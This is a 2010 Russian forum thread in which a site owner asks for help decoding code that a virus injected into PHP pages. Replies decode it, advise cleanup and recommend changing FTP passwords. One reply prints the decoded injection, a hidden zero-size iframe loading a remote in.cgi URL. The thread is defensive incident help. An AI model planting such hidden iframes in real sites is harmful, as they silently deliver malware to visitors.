Троян на сайте, помогите расшифровать

Тема в разделе ".:: Уязвимости", создана пользователем bouton, 3 май 2010.

Статус темы:
Закрыта.
  1. bouton

    bouton Постоялец

    Регистр.:
    6 сен 2007
    Сообщения:
    144
    Симпатии:
    24
    Доброго времени суток. Сегодня обноружил на одном из своих сайтов вирус. Каспер не давал мне даже зайти на сайт. Обнаружилось что вирус добавлял в файлы index.php menu.php default.php вот этот год:

    Я удалил все его проделки но вот боюсь повторения этого.

    Как мне расшифровать это дело? Кто нибудь может помочь? И ещё встречался ли кто нибудь с данным зверем, как его победить.
    Спасибо за помощь
     
  2. Belial

    Belial

    Регистр.:
    1 фев 2010
    Сообщения:
    236
    Симпатии:
    113
    document.write(sadasd);
    замени на
    alert(sadasd);
     
    BaNru нравится это.
  3. bouton

    bouton Постоялец

    Регистр.:
    6 сен 2007
    Сообщения:
    144
    Симпатии:
    24
    не охото экспериментировать на живом сайте. А что должно получиться?
     
  4. Belial

    Belial

    Регистр.:
    1 фев 2010
    Сообщения:
    236
    Симпатии:
    113
    Зачем же на живом, сохраняешь этот код в хтмл файл, меняешь и смотришь. Ифрейм там.
     
  5. shamantc

    shamantc ЗлОй ШаМан

    Заблокирован
    Регистр.:
    3 ноя 2008
    Сообщения:
    655
    Симпатии:
    184
    HTML:
    <iframe src='http://click-sape.ru/in.cgi?2' width='0px' height='0px' style='visibility:hidden; border:none;'></iframe>
     
  6. Andrey-varvara

    Andrey-varvara Постоялец

    Регистр.:
    1 май 2007
    Сообщения:
    73
    Симпатии:
    98
    Чтоб такое не повторилось:
    1. скачай CureIT, проверь им те компы/ноутбуки с которых заходил по ФТП на сайт. 100% вирусня у тебя.
    2. Поменяй пароль на фтп
    3. Делай сложные пароли и НИКОГДА не храни их в ФТП менеджерах
     
Статус темы:
Закрыта.